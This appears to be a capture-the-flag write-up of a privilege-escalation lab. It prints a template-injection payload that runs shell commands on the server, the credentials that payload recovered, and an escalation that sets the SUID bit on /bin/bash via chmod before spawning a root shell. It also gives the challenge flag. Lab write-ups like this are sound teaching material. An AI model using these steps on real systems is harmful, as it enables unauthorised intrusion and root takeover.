AUCHALL - [Privesc] - Temp Privesc

You,AUCHALLPrivesc
Back

Challenge Description

Based on the credentials you got from Temp, it's time you escalate your privileges.

Solution

On running the following payload in Temp Web challenge we got credentials

http://SERVER-IP:PORT/{{ self.__init__.__globals__.__builtins__.__import__('os').popen('cat /app/app.py').read() }}

Alt text

Credentials

Username: theflash2k
Password: 6s1251l7sj1

Using those credentials

ssh [email protected] -p PORT

First thing we would do is sudo -l

Alt text

Then we would check for suid binaries

find / -perm /4000 2>/dev/null

Alt text

/usr/bin/chmod looked interesting

Go to this site (opens in a new tab)

$ LFILE=/bin/bash
$ /usr/bin/chmod 6777 $LFILE

Now suid bit of /bin/bash binary is set

Alt text

$ bash -p

Alt text

Flag

Flag is dynamic

CY243L{c0nf1g_us3rs_and_su1d_ez_pz_F5802AE_8Tcc_MocB}

Writeups 2023 © RootxRAN.